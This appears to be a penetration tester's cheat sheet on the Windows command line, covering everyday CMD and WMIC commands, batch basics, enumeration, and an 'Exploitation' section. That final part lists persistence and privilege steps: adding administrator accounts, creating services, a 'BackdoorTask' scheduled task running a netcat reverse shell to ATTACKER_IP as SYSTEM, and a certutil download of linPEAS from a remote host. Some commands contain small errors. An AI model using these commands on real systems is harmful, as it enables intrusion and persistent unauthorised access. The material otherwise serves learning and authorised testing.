Command Line

Roy Arisse
3 mei 2025

The Windows Command Line, also known as MS Windows Command Prompt or simply CMD is Windows' default Command Line Interpreter, which is a Command Line Interface or CLI. The Prompt consists of the executable named cmd.exe which prompts or waits for supported commands or runs commands from a script file.

Usage

We can only execute commands in the Windows Path , which can be retrieved using the set command, to list all environment variables.

:::: General ::::
:: Environment variables
set
:: Version
ver
:: Clear screen
cls

:::: Getting help ::
help
:: Get help about given command
set /?

:::: System information ::::
systeminfo
hostname
driverquery

:::: Network information ::::
ipconfig
ipconfig /all
ping HOST.tld
tracert HOST.tld
nslookup HOST.tld

:::: Network connections ::::
netstat
netstat -abon

:::: Disks ::::
chkdsk
sfc /scannow

:::: Folders ::::
cd
cd DIR
cd ..
dir
tree

:::: Files ::::
copy SRC DST
move SRC DST
erase FILE
del FILE
type FILE
echo "SAMPLE" > INTOFILE

more FILE
type FILE | more

:::: Processes ::::
tasklist
tasklist /M
tasklist /FI "imagename eq sshd.exe"
taskkill /PID 1234

:::: Services ::::
net start SERVICENAME
net stop SERVICENAME
sc start SERVICENAME
sc stop SERVICENAME

WMIC

Also Windows Management Instrumentation.

:::: Processes ::::
wmic process list

:::: Services ::::
wmic service where "name like 'SEARCHSTRING'" get Name,PathName

:::: Software ::::
:: Installed apps / software
wmic product get name,version,vendor
:: Updates
wmic qfe get Caption, Description

:::: Users ::::
:: List users and their SID
wmic useraccount get name,sid

Scripts

Also known as batch files, which contain calls to commands, following the batch syntax.

Comments start with ::, e.g. :: This is a comment
Variables
- Setting: set name=World
- Getting: %name%
Use backticks to escape special characters: C:\Program` Files` `(x86`)\Something .
- Enclosing a string into quotes also works: "C:\Program Files (x86)\Something" .

example.bat

@echo off
set name=World
echo Hello, %name%!
pause

Enumeration

Also Information Gathering, all commands below DO NOT change any settings on the system, so they leave minimal traces! Off course if any auditing is enabled, your actions might be logged anyway.

:::: Machine info :::::
:: Local machine settings
net accounts
:: If in domain, password policy, lockout duration, etc.
net accounts /domain

:::: Networking ::::
:: Other systems on same LAN recently communicated with
arp -a 

:::: Services ::::
:: Started services
net start
:: All services
sc query state=all
sc qc SERVICENAME
netstat -noa | findstr "LISTENING" | findstr "PID"

:::: Updates ::::
:: Open Windows Update
control /name Microsoft.WindowsUpdate

:::: Current user ::::
whoami
:: User details
whoami /user
:: User privileges
whoami /priv
:: User groups
whoami /groups
:: All aforementioned
whoami /all

:::: Other users and groups ::::
:: List user accounts
net user
:: Details of administrator
net user Administrator
:: List local user groups
net localgroup
:: List users that belong to group
net localgroup administrators

:: :: Scheduled tasks ::::
:: List all
schtasks
:: List task by name
schtasks /query /tn "\FOLDER\TASKNAME"

:::: Folders ::::
:: Search for a file from "\" root ending with wildcard "*"
dir "\Filename*" /s 

::: Networking ::::
host DOMAIN.TLD
nslookup -type=MX DOMAIN.TLD 1.1.1.1
:: List SMB shares
net share

Exploitation

:::: Files ::::
move file.exe C:\Windows\Tasks
copy file.exe C:\Windows\Tasks\file.exe

:::: Services ::::
sc create NEWSERVICE binPath=PATHTOEXE start=auto
sc config SERVICENAME binPath=PATHTOEXE start=auto obj="LocalSystem"
sc delete BackdoorService

:::: Other users and groups ::::
net user USER NEWPASSWORD # Change user password
net user NEWUSER PASSWORD /add # Add account
net localgroup Administrators USERNAME /add # Add user to Administrators group

:::: Permissions ::::
takeown FILEPATH # Reassign file ownership to Administrator
icacls FILEPATH /grant Administrator:F # Grant user full access
icacls FOLDER /setowner Users # Set Folder owner to Users
icacls FOLDER # Get folder and file permissions
gpupdate /force # Forcefully apply new GPO

:::: Scheduled tasks ::::
schtasks /create /sc minute /mo 1 /tn BackdoorTask /tr "C\tools\nc64.exe -e cmd.exe ATTACKER_IP 1337" /ru SYSTEM

Transfer files from Linux to Windows

bash ATTACKER

nc 4444 < somefile.kirbi

cmd TARGET

:: Start nc -lnvp 4444 locally using LOLBin
certutil.exe -urlcache -split -f "http://10.12.8.10:8000/linPEAS.bat" linPEAS.bat